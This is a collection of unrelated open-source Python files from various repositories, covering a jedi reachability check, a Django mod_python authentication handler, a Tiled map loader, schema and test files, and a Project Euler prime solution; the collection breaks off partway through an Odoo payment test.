UNREACHABLE = Status(False, 'unreachable')
UNSURE = Status(None, 'unsure')


def break_check(evaluator, base_scope, stmt, origin_scope=None):
    """Return the Status describing whether `stmt` is reachable from
    `base_scope`, short-circuiting to REACHABLE when the statement's flow
    scope is a direct parent of `origin_scope`."""
    from jedi.evaluate.representation import wrap
    element_scope = wrap(evaluator, stmt.get_parent_scope(include_flows=True))
    # Direct parents get resolved, we filter scopes that are separate branches.
    # This makes sense for autocompletion and static analysis. For actual
    # Python it doesn't matter, because we're talking about potentially
    # unreachable code.
    # e.g. `if 0:` would cause all name lookup within the flow make
    # unaccessible. This is not a "problem" in Python, because the code is
    # never called. In Jedi though, we still want to infer types.
    while origin_scope is not None:
        if element_scope == origin_scope:
            return REACHABLE
        origin_scope = origin_scope.parent
    return _break_check(evaluator, stmt, base_scope, element_scope)


def _break_check(evaluator, stmt, base_scope, element_scope):
    """Walk from element_scope up towards base_scope, AND-ing together the
    reachability contributed by each flow statement on the way."""
    from jedi.evaluate.representation import wrap
    element_scope = wrap(evaluator, element_scope)
    base_scope = wrap(evaluator, base_scope)

    reachable = REACHABLE
    if isinstance(element_scope, pr.IfStmt):
        if element_scope.node_after_else(stmt):
            # stmt is in the `else` branch: it is reachable only if every
            # preceding condition can be false, hence the invert() below.
            for check_node in element_scope.check_nodes():
                reachable = _check_if(evaluator, check_node)
                if reachable in (REACHABLE, UNSURE):
                    break
            reachable = reachable.invert()
        else:
            # stmt is inside one of the if/elif branches
            node = element_scope.node_in_which_check_node(stmt)
            reachable = _check_if(evaluator, node)
    elif isinstance(element_scope, (pr.TryStmt, pr.WhileStmt)):
        # try/while bodies may or may not run; nothing more can be decided
        return UNSURE

    # Only reachable branches need to be examined further.
    if reachable in (UNREACHABLE, UNSURE):
        return reachable

    if base_scope != element_scope and base_scope != element_scope.parent:
        # recurse outwards until we reach base_scope
        return reachable & _break_check(evaluator, stmt, base_scope, element_scope.parent)
    return reachable


def _check_if(evaluator, node):
    """Evaluate an `if` condition node to REACHABLE / UNREACHABLE / UNSURE."""
    types = evaluator.eval_element(node)
    values = set(x.py__bool__() for x in types)
    if len(values) == 1:
        # all inferred types agree on the truth value
        return Status.lookup_table[values.pop()]
    else:
        return UNSURE
dcroc16/skunk_works
refs/heads/master
google_appengine/lib/django-0.96/django/contrib/auth/handlers/modpython.py
33
from mod_python import apache
import os


def authenhandler(req, **kwargs):
    """
    Authentication handler that checks against Django's auth database.

    Returns apache.OK on success, apache.HTTP_UNAUTHORIZED otherwise.
    Behavior is tuned via PythonOption directives (permission name,
    staff/superuser requirements, settings module).
    """

    # mod_python fakes the environ, and thus doesn't process SetEnv.  This fixes
    # that so that the following import works
    os.environ.update(req.subprocess_env)

    # check for PythonOptions
    _str_to_bool = lambda s: s.lower() in ('1', 'true', 'on', 'yes')
    options = req.get_options()
    permission_name = options.get('DjangoPermissionName', None)
    # staff is required by default; superuser is not
    staff_only = _str_to_bool(options.get('DjangoRequireStaffStatus', "on"))
    superuser_only = _str_to_bool(options.get('DjangoRequireSuperuserStatus', "off"))
    settings_module = options.get('DJANGO_SETTINGS_MODULE', None)
    if settings_module:
        os.environ['DJANGO_SETTINGS_MODULE'] = settings_module

    # imports deferred until DJANGO_SETTINGS_MODULE is in the environment
    from django.contrib.auth.models import User
    from django import db
    db.reset_queries()

    # check that the username is valid
    # NOTE(review): this deliberately rebinds the ``kwargs`` parameter to the
    # User lookup filter; any handler kwargs are discarded from here on.
    kwargs = {'username': req.user, 'is_active': True}
    if staff_only:
        kwargs['is_staff'] = True
    if superuser_only:
        kwargs['is_superuser'] = True
    try:
        try:
            user = User.objects.get(**kwargs)
        except User.DoesNotExist:
            return apache.HTTP_UNAUTHORIZED

        # check the password and any permission given
        if user.check_password(req.get_basic_auth_pw()):
            if permission_name:
                if user.has_perm(permission_name):
                    return apache.OK
                else:
                    return apache.HTTP_UNAUTHORIZED
            else:
                return apache.OK
        else:
            return apache.HTTP_UNAUTHORIZED
    finally:
        # always release the DB connection back to Apache's worker
        db.connection.close()
th0th/harmony
refs/heads/master
harmony/taghandler.py
1
# -*- coding: utf-8 -*-

from mutagen.easyid3 import EasyID3


class TagHandler:
    """Reads ID3 tags from audio files and builds file names from a mask."""

    def __init__(self):
        # format-string mask used by generate_filename(); set via set_mask()
        self.mask = None

    def set_mask(self, mask):
        """Remember the file-name format mask, e.g. ``'{artist} - {title}'``."""
        self.mask = mask

    def read_tags(self, filepath):
        """Return the file's ID3 tags as a dict of UTF-8 encoded byte strings.

        Only the first value of each (potentially multi-valued) tag is kept.
        """
        id3 = EasyID3(filepath)
        return dict((name, id3[name][0].encode('utf-8')) for name in id3)

    def generate_filename(self, filepath):
        """Format the current mask with the tags read from *filepath*."""
        return self.mask.format(**self.read_tags(filepath))
Rastagong/A-Scholar-In-The-Woods
refs/heads/master
Releases/Post Compo/Sources/narro/tmxreader.py
4
# -*- coding: utf-8 -*-
"""
TileMap loader for python for Tiled, a generic tile map editor
from http://mapeditor.org/ .
It loads the \*.tmx files produced by Tiled.
"""

# Versioning scheme based on: http://en.wikipedia.org/wiki/Versioning#Designating_development_stage
#
#   +-- api change, probably incompatible with older versions
#   |     +-- enhancements but no api change
#   |     |
# major.minor[.build[.revision]]
#                |
#                +-|* 0 for alpha (status)
#                  |* 1 for beta (status)
#                  |* 2 for release candidate
#                  |* 3 for (public) release
#
# For instance:
#     * 1.2.0.1 instead of 1.2-a
#     * 1.2.1.2 instead of 1.2-b2 (beta with some bug fixes)
#     * 1.2.2.3 instead of 1.2-rc (release candidate)
#     * 1.2.3.0 instead of 1.2-r (commercial distribution)
#     * 1.2.3.5 instead of 1.2-r5 (commercial distribution with many bug fixes)
__revision__ = "$Rev: 115 $"
__version__ = "3.1.0." + __revision__[6:-2]
__author__ = 'DR0ID @ 2009-2011'


# import logging
# #the following few lines are needed to use logging if this module used without
# # a previous call to logging.basicConfig()
# if 0 == len(logging.root.handlers):
#     logging.basicConfig(level=logging.DEBUG)

# _LOGGER = logging.getLogger('tiledtmxloader')
# if __debug__:
#     _LOGGER.debug('%s loading ...' % (__name__))

#  -----------------------------------------------------------------------------

import sys
from xml.dom import minidom, Node
# NOTE(review): bare except below, and both branches import the same
# StringIO -- the fallback appears to be a Python 2/3 leftover; confirm.
try:
    import io
    from io import StringIO
except:
    from io import StringIO
import os.path
import struct
import array

#  -----------------------------------------------------------------------------
class TileMap(object):
    """

    The TileMap holds all the map data.

    :Ivariables:
        orientation : string
            orthogonal or isometric or hexagonal or shifted
        tilewidth : int
            width of the tiles (for all layers)
        tileheight : int
            height of the tiles (for all layers)
        width : int
            width of the map (number of tiles)
        height : int
            height of the map (number of tiles)
        version : string
            version of the map format
        tile_sets : list
            list of TileSet
        properties : dict
            the propertis set in the editor, name-value pairs, strings
        pixel_width : int
            width of the map in pixels
        pixel_height : int
            height of the map in pixels
        layers : list
            list of TileLayer
        map_file_name : dict
            file name of the map
        named_layers : dict of string:TledLayer
            dict containing {name : TileLayer}
        named_tile_sets : dict
            dict containing {name : TileSet}

    """

    def __init__(self):
        # This is the top container for all data. The gid is the global id
        # (for a image).
        # Before calling convert most of the values are strings. Some additional
        # values are also calculated, see convert() for details. After calling
        # convert, most values are integers or floats where appropriat.
        """
        The TileMap holds all the map data.
        """
        # set through parser
        self.orientation = None
        self.tileheight = 0
        self.tilewidth = 0
        self.width = 0
        self.height = 0
        self.version = 0
        self.tile_sets = []  # TileSet
        # ISSUE 9: object groups should be in the same order as layers
        self.layers = []  # WorldTileLayer <- what order? back to front (guessed)
        # self.object_groups = []
        self.properties = {}  # {name: value}
        # additional info
        self.pixel_width = 0
        self.pixel_height = 0
        self.named_layers = {}  # {name: layer}
        self.named_tile_sets = {}  # {name: tile_set}
        self.map_file_name = ""

    def convert(self):
        """
        Converts numerical values from strings to numerical values.
        It also calculates or set additional data:
        pixel_width
        pixel_height
        named_layers
        named_tile_sets
        """
        self.tilewidth = int(self.tilewidth)
        self.tileheight = int(self.tileheight)
        self.width = int(self.width)
        self.height = int(self.height)
        # overall map size in pixels, derived from tile size and tile count
        self.pixel_width = self.width * self.tilewidth
        self.pixel_height = self.height * self.tileheight

        for layer in self.layers:
            # ISSUE 9
            if not layer.is_object_group:
                # tile layers inherit the map's tile dimensions
                layer.tilewidth = self.tilewidth
                layer.tileheight = self.tileheight
                self.named_layers[layer.name] = layer
            layer.convert()

        for tile_set in self.tile_sets:
            self.named_tile_sets[tile_set.name] = tile_set
            tile_set.spacing = int(tile_set.spacing)
            tile_set.margin = int(tile_set.margin)
            for img in tile_set.images:
                if img.trans:
                    # 'RRGGBB' hex string -> (r, g, b) int tuple
                    img.trans = (int(img.trans[:2], 16), \
                                 int(img.trans[2:4], 16), \
                                 int(img.trans[4:], 16))

    def decode(self):
        """
        Decodes the TileLayer encoded_content and saves it in decoded_content.
        """
        for layer in self.layers:
            if not layer.is_object_group:
                layer.decode()

#  -----------------------------------------------------------------------------


class TileSet(object):
    """
    A tileset holds the tiles and its images.
:Ivariables: firstgid : int the first gid of this tileset name : string the name of this TileSet images : list list of TileImages tiles : list list of Tiles indexed_images : dict after calling load() it is dict containing id: image spacing : int the spacing between tiles marging : int the marging of the tiles properties : dict the propertis set in the editor, name-value pairs tilewidth : int the actual width of the tile, can be different from the tilewidth of the map tilehight : int the actual hight of th etile, can be different from the tilehight of the map """ def __init__(self): self.firstgid = 0 self.name = None self.images = [] # TileImage self.tiles = [] # Tile self.indexed_images = {} # {id:image} self.spacing = 0 self.margin = 0 self.properties = {} self.tileheight = 0 self.tilewidth = 0 # ----------------------------------------------------------------------------- class TileImage(object): """ An image of a tile or just an image. :Ivariables: id : int id of this image (has nothing to do with gid) format : string the format as string, only 'png' at the moment source : string filename of the image. either this is set or the content encoding : string encoding of the content trans : tuple of (r,g,b) the colorkey color, raw as hex, after calling convert just a (r,g,b) tuple properties : dict the propertis set in the editor, name-value pairs image : TileImage after calling load the pygame surface """ def __init__(self): self.id = 0 self.format = None self.source = None self.encoding = None # from <data>...</data> self.content = None # from <data>...</data> self.image = None self.trans = None self.properties = {} # {name: value} # ----------------------------------------------------------------------------- class Tile(object): """ A single tile. 
:Ivariables: id : int id of the tile gid = TileSet.firstgid + Tile.id images : list of :class:TileImage list of TileImage, either its 'id' or 'image data' will be set properties : dict of name:value the propertis set in the editor, name-value pairs """ # [20:22] DR0ID_: to sum up: there are two use cases, # if the tile element has a child element 'image' then tile is # standalone with its own id and # the other case where a tileset is present then it # referes to the image with that id in the tileset def __init__(self): self.id = 0 self.images = [] # uses TileImage but either only id will be set or image data self.properties = {} # {name: value} # ----------------------------------------------------------------------------- class TileLayer(object): """ A layer of the world. :Ivariables: x : int position of layer in the world in number of tiles (not pixels) y : int position of layer in the world in number of tiles (not pixels) width : int number of tiles in x direction height : int number of tiles in y direction pixel_width : int width of layer in pixels pixel_height : int height of layer in pixels name : string name of this layer opacity : float float from 0 (full transparent) to 1.0 (opaque) decoded_content : list list of graphics id going through the map:: e.g [1, 1, 1, ] where decoded_content[0] is (0,0) decoded_content[1] is (1,0) ... decoded_content[w] is (width,0) decoded_content[w+1] is (0,1) ... 
decoded_content[w * h] is (width,height) usage: graphics id = decoded_content[tile_x + tile_y * width] content2D : list list of list, usage: graphics id = content2D[x][y] """ def __init__(self): self.width = 0 self.height = 0 self.x = 0 self.y = 0 self.pixel_width = 0 self.pixel_height = 0 self.name = None self.opacity = -1 self.encoding = None self.compression = None self.encoded_content = None self.decoded_content = [] self.visible = True self.properties = {} # {name: value} self.content2D = None self.is_object_group = False # ISSUE 9 def decode(self): """ Converts the contents in a list of integers which are the gid of the used tiles. If necessairy it decodes and uncompresses the contents. """ self.decoded_content = [] if self.encoded_content: content = self.encoded_content if self.encoding: if self.encoding.lower() == 'base64': content = decode_base64(content) elif self.encoding.lower() == 'csv': list_of_lines = content.split() for line in list_of_lines: self.decoded_content.extend(line.split(',')) self.decoded_content = list(map(int, \ [val for val in self.decoded_content if val])) content = "" else: raise Exception('unknown data encoding %s' % \ (self.encoding)) else: # in the case of xml the encoded_content already contains a # list of integers self.decoded_content = list(map(int, self.encoded_content)) content = "" if self.compression: if self.compression == 'gzip': content = decompress_gzip(content) elif self.compression == 'zlib': content = decompress_zlib(content) else: raise Exception('unknown data compression %s' % \ (self.compression)) else: raise Exception('no encoded content to decode') struc = struct.Struct("<" + "I" * self.width) struc_unpack_from = struc.unpack_from self_decoded_content_extend = self.decoded_content.extend for idx in range(0, len(content), 4 * self.width): val = struc_unpack_from(content, idx) self_decoded_content_extend(val) arr = array.array('I') arr.fromlist(self.decoded_content) self.decoded_content = arr # TODO: generate 
property grid here?? self._gen_2D() def _gen_2D(self): self.content2D = [] # generate the needed lists and fill them for xpos in range(self.width): self.content2D.append(array.array('I')) for ypos in range(self.height): self.content2D[xpos].append( \ self.decoded_content[xpos + ypos * self.width]) def pretty_print(self): num = 0 for y in range(int(self.height)): output = "" for x in range(int(self.width)): output += str(self.decoded_content[num]) num += 1 print(output) def convert(self): self.opacity = float(self.opacity) self.x = int(self.x) self.y = int(self.y) self.width = int(self.width) self.height = int(self.height) self.pixel_width = self.width * self.tilewidth self.pixel_height = self.height * self.tileheight self.visible = bool(int(self.visible)) # def get_visible_tile_range(self, xmin, ymin, xmax, ymax): # tile_w = self.pixel_width / self.width # tile_h = self.pixel_height / self.height # left = int(round(float(xmin) / tile_w)) - 1 # right = int(round(float(xmax) / tile_w)) + 2 # top = int(round(float(ymin) / tile_h)) - 1 # bottom = int(round(float(ymax) / tile_h)) + 2 # return (left, top, left - right, top - bottom) # def get_tiles(self, xmin, ymin, xmax, ymax): # tiles = [] # if self.visible: # for ypos in range(ymin, ymax): # for xpos in range(xmin, xmax): # try: # img_idx = self.content2D[xpos][ypos] # if img_idx: # tiles.append((xpos, ypos, img_idx)) # except IndexError: # pass # return tiles # ----------------------------------------------------------------------------- class MapObjectGroupLayer(object): """ Group of objects on the map. 
:Ivariables: x : int the x position y : int the y position width : int width of the bounding box (usually 0, so no use) height : int height of the bounding box (usually 0, so no use) name : string name of the group objects : list list of the map objects """ def __init__(self): self.width = 0 self.height = 0 self.name = None self.objects = [] self.x = 0 self.y = 0 self.visible = True self.properties = {} # {name: value} self.is_object_group = True # ISSUE 9 def convert(self): self.x = int(self.x) self.y = int(self.y) self.width = int(self.width) self.height = int(self.height) for map_obj in self.objects: map_obj.x = int(map_obj.x) map_obj.y = int(map_obj.y) map_obj.width = int(map_obj.width) map_obj.height = int(map_obj.height) # ----------------------------------------------------------------------------- class MapObject(object): """ A single object on the map. :Ivariables: x : int x position relative to group x position y : int y position relative to group y position width : int width of this object height : int height of this object type : string the type of this object image_source : string source path of the image for this object image : :class:TileImage after loading this is the pygame surface containing the image """ def __init__(self): self.name = None self.x = 0 self.y = 0 self.width = 0 self.height = 0 self.type = None self.image_source = None self.image = None self.properties = {} # {name: value} # ----------------------------------------------------------------------------- def decode_base64(in_str): """ Decodes a base64 string and returns it. :Parameters: in_str : string base64 encoded string :returns: decoded string """ import base64 return base64.decodestring(in_str.encode('latin-1')) # ----------------------------------------------------------------------------- def decompress_gzip(in_str): """ Uncompresses a gzip string and returns it. 
:Parameters: in_str : string gzip compressed string :returns: uncompressed string """ import gzip if sys.version_info > (2, ): from io import BytesIO copmressed_stream = BytesIO(in_str) else: # gzip can only handle file object therefore using StringIO copmressed_stream = StringIO(in_str.decode("latin-1")) gzipper = gzip.GzipFile(fileobj=copmressed_stream) content = gzipper.read() gzipper.close() return content # ----------------------------------------------------------------------------- def decompress_zlib(in_str): """ Uncompresses a zlib string and returns it. :Parameters: in_str : string zlib compressed string :returns: uncompressed string """ import zlib content = zlib.decompress(in_str) return content # ----------------------------------------------------------------------------- def printer(obj, ident=''): """ Helper function, prints a hirarchy of objects. """ import inspect print((ident + obj.__class__.__name__.upper())) ident += ' ' lists = [] for name in dir(obj): elem = getattr(obj, name) if isinstance(elem, list) and name != 'decoded_content': lists.append(elem) elif not inspect.ismethod(elem): if not name.startswith('__'): if name == 'data' and elem: print((ident + 'data = ')) printer(elem, ident + ' ') else: print((ident + '%s\t= %s' % (name, getattr(obj, name)))) for objt_list in lists: for _obj in objt_list: printer(_obj, ident + ' ') # ----------------------------------------------------------------------------- class VersionError(Exception): pass # ----------------------------------------------------------------------------- class TileMapParser(object): """ Allows to parse and decode map files for 'Tiled', a open source map editor written in java. 
It can be found here: http://mapeditor.org/ """ def _build_tile_set(self, tile_set_node, world_map): tile_set = TileSet() self._set_attributes(tile_set_node, tile_set) if hasattr(tile_set, "source"): tile_set = self._parse_tsx(tile_set.source, tile_set, world_map) else: tile_set = self._get_tile_set(tile_set_node, tile_set, \ self.map_file_name) world_map.tile_sets.append(tile_set) def _parse_tsx(self, file_name, tile_set, world_map): # ISSUE 5: the *.tsx file is probably relative to the *.tmx file if not os.path.isabs(file_name): # print "map file name", self.map_file_name file_name = self._get_abs_path(self.map_file_name, file_name) # print "tsx filename: ", file_name # would be more elegant to use "with open(file_name, "rb") as file:" # but that is python 2.6 file = None try: file = open(file_name, "rb") dom = minidom.parseString(file.read()) finally: if file: file.close() for node in self._get_nodes(dom.childNodes, 'tileset'): tile_set = self._get_tile_set(node, tile_set, file_name) break return tile_set def _get_tile_set(self, tile_set_node, tile_set, base_path): for node in self._get_nodes(tile_set_node.childNodes, 'image'): self._build_tile_set_image(node, tile_set, base_path) for node in self._get_nodes(tile_set_node.childNodes, 'tile'): self._build_tile_set_tile(node, tile_set) self._set_attributes(tile_set_node, tile_set) return tile_set def _build_tile_set_image(self, image_node, tile_set, base_path): image = TileImage() self._set_attributes(image_node, image) # id of TileImage has to be set! 
-> Tile.TileImage will only have id set for node in self._get_nodes(image_node.childNodes, 'data'): self._set_attributes(node, image) image.content = node.childNodes[0].nodeValue image.source = self._get_abs_path(base_path, image.source) # ISSUE 5 tile_set.images.append(image) def _get_abs_path(self, base, relative): if os.path.isabs(relative): return relative if os.path.isfile(base): base = os.path.dirname(base) return os.path.abspath(os.path.join(base, relative)) def _build_tile_set_tile(self, tile_set_node, tile_set): tile = Tile() self._set_attributes(tile_set_node, tile) for node in self._get_nodes(tile_set_node.childNodes, 'image'): self._build_tile_set_tile_image(node, tile) tile_set.tiles.append(tile) def _build_tile_set_tile_image(self, tile_node, tile): tile_image = TileImage() self._set_attributes(tile_node, tile_image) for node in self._get_nodes(tile_node.childNodes, 'data'): self._set_attributes(node, tile_image) tile_image.content = node.childNodes[0].nodeValue tile.images.append(tile_image) def _build_layer(self, layer_node, world_map): layer = TileLayer() self._set_attributes(layer_node, layer) for node in self._get_nodes(layer_node.childNodes, 'data'): self._set_attributes(node, layer) if layer.encoding: layer.encoded_content = node.lastChild.nodeValue else: #print 'has childnodes', node.hasChildNodes() layer.encoded_content = [] for child in node.childNodes: if child.nodeType == Node.ELEMENT_NODE and \ child.nodeName == "tile": val = child.attributes["gid"].nodeValue #print child, val layer.encoded_content.append(val) world_map.layers.append(layer) def _build_world_map(self, world_node): world_map = TileMap() self._set_attributes(world_node, world_map) if world_map.version != "1.0": raise VersionError('this parser was made for maps of version 1.0, found version %s' % world_map.version) for node in self._get_nodes(world_node.childNodes, 'tileset'): self._build_tile_set(node, world_map) for node in self._get_nodes(world_node.childNodes, 'layer'): 
self._build_layer(node, world_map) for node in self._get_nodes(world_node.childNodes, 'objectgroup'): self._build_object_groups(node, world_map) return world_map def _build_object_groups(self, object_group_node, world_map): object_group = MapObjectGroupLayer() self._set_attributes(object_group_node, object_group) for node in self._get_nodes(object_group_node.childNodes, 'object'): tiled_object = MapObject() self._set_attributes(node, tiled_object) for img_node in self._get_nodes(node.childNodes, 'image'): tiled_object.image_source = \ img_node.attributes['source'].nodeValue object_group.objects.append(tiled_object) # ISSUE 9 world_map.layers.append(object_group) # -- helpers -- # def _get_nodes(self, nodes, name): for node in nodes: if node.nodeType == Node.ELEMENT_NODE and node.nodeName == name: yield node def _set_attributes(self, node, obj): attrs = node.attributes for attr_name in list(attrs.keys()): setattr(obj, attr_name, attrs.get(attr_name).nodeValue) self._get_properties(node, obj) def _get_properties(self, node, obj): props = {} for properties_node in self._get_nodes(node.childNodes, 'properties'): for property_node in self._get_nodes(properties_node.childNodes, 'property'): try: props[property_node.attributes['name'].nodeValue] = \ property_node.attributes['value'].nodeValue except KeyError: props[property_node.attributes['name'].nodeValue] = \ property_node.lastChild.nodeValue obj.properties.update(props) # -- parsers -- # def parse(self, file_name): """ Parses the given map. Does no decoding nor loading of the data. 
:return: instance of TileMap """ # would be more elegant to use # "with open(file_name, "rb") as tmx_file:" but that is python 2.6 self.map_file_name = os.path.abspath(file_name) tmx_file = None try: tmx_file = open(self.map_file_name, "rb") dom = minidom.parseString(tmx_file.read()) finally: if tmx_file: tmx_file.close() for node in self._get_nodes(dom.childNodes, 'map'): world_map = self._build_world_map(node) break world_map.map_file_name = self.map_file_name world_map.convert() return world_map def parse_decode(self, file_name): """ Parses the map but additionally decodes the data. :return: instance of TileMap """ world_map = self.parse(file_name) world_map.decode() return world_map # ----------------------------------------------------------------------------- class AbstractResourceLoader(object): """ Abstract base class for the resource loader. """ FLIP_X = 1 << 31 FLIP_Y = 1 << 30 def __init__(self): self.indexed_tiles = {} # {gid: (offsetx, offsety, image} self.world_map = None self._img_cache = {} def _load_image(self, filename, colorkey=None): # -> image """ Load a single image. :Parameters: filename : string Path to the file to be loaded. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None :rtype: image """ raise NotImplementedError('This should be implemented in a inherited class') def _load_image_file_like(self, file_like_obj, colorkey=None): # -> image """ Load a image from a file like object. :Parameters: file_like_obj : file This is the file like object to load the image from. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None :rtype: image """ raise NotImplementedError('This should be implemented in a inherited class') def _load_image_parts(self, filename, margin, spacing, tilewidth, tileheight, colorkey=None): #-> [images] """ Load different tile images from one source image. :Parameters: filename : string Path to image to be loaded. 
margin : int The margin around the image. spacing : int The space between the tile images. tilewidth : int The width of a single tile. tileheight : int The height of a single tile. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None Luckily that iteration is so easy in python:: ... w, h = image_size for y in xrange(margin, h, tileheight + spacing): for x in xrange(margin, w, tilewidth + spacing): ... :rtype: a list of images """ raise NotImplementedError('This should be implemented in a inherited class') def load(self, tile_map): """ """ self.world_map = tile_map for tile_set in tile_map.tile_sets: # do images first, because tiles could reference it for img in tile_set.images: if img.source: self._load_image_from_source(tile_map, tile_set, img) else: tile_set.indexed_images[img.id] = self._load_tile_image(img) # tiles for tile in tile_set.tiles: for img in tile.images: if not img.content and not img.source: # only image id set indexed_img = tile_set.indexed_images[img.id] self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img) else: if img.source: self._load_image_from_source(tile_map, tile_set, img) else: indexed_img = self._load_tile_image(img) self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img) def _load_image_from_source(self, tile_map, tile_set, a_tile_image): # relative path to file img_path = os.path.join(os.path.dirname(tile_map.map_file_name), \ a_tile_image.source) tile_width = int(tile_map.tilewidth) tile_height = int(tile_map.tileheight) if tile_set.tileheight: tile_width = int(tile_set.tilewidth) if tile_set.tilewidth: tile_height = int(tile_set.tileheight) offsetx = 0 offsety = 0 # the offset is used for pygame because the origin is topleft in pygame if tile_height > tile_map.tileheight: offsety = tile_height - tile_map.tileheight idx = 0 for image in self._load_image_parts(img_path, \ tile_set.margin, tile_set.spacing, \ tile_width, tile_height, 
a_tile_image.trans): self.indexed_tiles[int(tile_set.firstgid) + idx] = \ (offsetx, -offsety, image) idx += 1 def _load_tile_image(self, a_tile_image): img_str = a_tile_image.content if a_tile_image.encoding: if a_tile_image.encoding == 'base64': img_str = decode_base64(a_tile_image.content) else: raise Exception('unknown image encoding %s' % a_tile_image.encoding) sio = StringIO(img_str) new_image = self._load_image_file_like(sio, a_tile_image.trans) return new_image # -----------------------------------------------------------------------------
weidongxu84/info-gatherer
refs/heads/master
django/contrib/localflavor/co/forms.py
196
""" Colombian-specific form helpers. """ from __future__ import absolute_import from django.contrib.localflavor.co.co_departments import DEPARTMENT_CHOICES from django.forms.fields import Select class CODepartmentSelect(Select): """ A Select widget that uses a list of Colombian states as its choices. """ def __init__(self, attrs=None): super(CODepartmentSelect, self).__init__(attrs, choices=DEPARTMENT_CHOICES)
mgagne/nova
refs/heads/master
nova/api/openstack/compute/schemas/v3/create_backup.py
59
# Copyright 2014 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.validation import parameter_types create_backup = { 'type': 'object', 'properties': { 'createBackup': { 'type': 'object', 'properties': { 'name': parameter_types.name, 'backup_type': { 'type': 'string', }, 'rotation': parameter_types.non_negative_integer, 'metadata': { 'type': 'object', } }, 'required': ['name', 'backup_type', 'rotation'], 'additionalProperties': False, }, }, 'required': ['createBackup'], 'additionalProperties': False, }
DailyActie/Surrogate-Model
refs/heads/master
01-codes/tensorflow-master/tensorflow/python/kernel_tests/division_past_test.py
1
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for division with division imported from __future__. This file should be exactly the same as division_past_test.py except for the __future__ division line. """ from __future__ import absolute_import # from __future__ import division # Intentionally skip this import from __future__ import print_function import numpy as np import tensorflow as tf class DivisionTestCase(tf.test.TestCase): def testDivision(self): """Test all the different ways to divide.""" values = [1, 2, 7, 11] functions = (lambda x: x), tf.constant # TODO(irving): Test int8, int16 once we support casts for those. dtypes = np.int32, np.int64, np.float32, np.float64 def check(x, y): if isinstance(x, tf.Tensor): x = x.eval() if isinstance(y, tf.Tensor): y = y.eval() self.assertEqual(x.dtype, y.dtype) self.assertEqual(x, y) with self.test_session(): for dtype in dtypes: for x in map(dtype, values): for y in map(dtype, values): for fx in functions: for fy in functions: tf_x = fx(x) tf_y = fy(y) div = x / y tf_div = tf_x / tf_y check(div, tf_div) floordiv = x // y tf_floordiv = tf_x // tf_y check(floordiv, tf_floordiv) if __name__ == "__main__": tf.test.main()
Adamssss/projectEuler
refs/heads/master
Problem 001-150 Python/pb058.py
1
import math import time t1 = time.time() prime = [] def primeSieve(n): global prime n = (n+1)//2 p = [True]*(n) i = 1 prime.append(2) while i < n: if p[i]: t = 2*i+1 prime.append(t) p[i] = False j = 2*i*i+2*i while j < n: p[j] = False j += t i += 1 return prime primeSieve(10000) def genPrime(): global prime b = prime[-1] while True: b = b+2 i = 0 t = True while (prime[i]*prime[i] < b): i=i+1 if (b%prime[i] == 0): t = False break if t: prime.append(b) break return b def isPrime(item): root = math.floor(math.sqrt(item)) i = 0 t = prime[i] while t <= root: if item%t == 0: return False if t < prime[-1]: i += 1 t = prime[i] else: t += genPrime() return True # diagonal prime ratio dpr = [] # first term: 1 is not a prime dpr.append([0,1]) # generate the new diagonals # put them into dpr def gen(n): s = 2*n+1 br = s*s bl = br-s+1 tl = bl-s+1 tr = tl-s+1 global dpr tempdpr = dpr[n-1][:] tempdpr[1] += 4 if isPrime(bl): tempdpr[0] += 1 if isPrime(tl): tempdpr[0] += 1 if isPrime(tr): tempdpr[0] += 1 dpr.append(tempdpr) def fallBelow(term): if term[0]/term[1] < 0.1: return True return False gen(1) i = 1 while not fallBelow(dpr[i]): i += 1 gen(i) print (i*2+1) print("time:",time.time()-t1)
aviciimaxwell/odoo
refs/heads/8.0
addons/payment_buckaroo/tests/test_buckaroo.py
321
# -*- coding: utf-8 -*- from lxml import objectify import urlparse import openerp from openerp.addons.payment.models.payment_acquirer import ValidationError from openerp.addons.payment.tests.common import PaymentAcquirerCommon from openerp.addons.payment_buckaroo.controllers.main import BuckarooController from openerp.tools import mute_logger @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooCommon(PaymentAcquirerCommon): def setUp(self): super(BuckarooCommon, self).setUp() cr, uid = self.cr, self.uid self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url') # get the buckaroo account model, self.buckaroo_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_buckaroo', 'payment_acquirer_buckaroo') @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooForm(BuckarooCommon): def test_10_Buckaroo_form_render(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid things buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # ---------------------------------------- # Test: button direct rendering # ---------------------------------------- form_values = { 'add_returndata': None, 'Brq_websitekey': buckaroo.brq_websitekey, 'Brq_amount': '2240.0', 'Brq_currency': 'EUR', 'Brq_invoicenumber': 'SO004', 'Brq_signature': '1b8c10074c622d965272a91a9e88b5b3777d2474', # update me 'brq_test': 'True', 'Brq_return': '%s' % urlparse.urljoin(self.base_url, BuckarooController._return_url), 'Brq_returncancel': '%s' % urlparse.urljoin(self.base_url, BuckarooController._cancel_url), 'Brq_returnerror': '%s' % urlparse.urljoin(self.base_url, BuckarooController._exception_url), 'Brq_returnreject': '%s' % 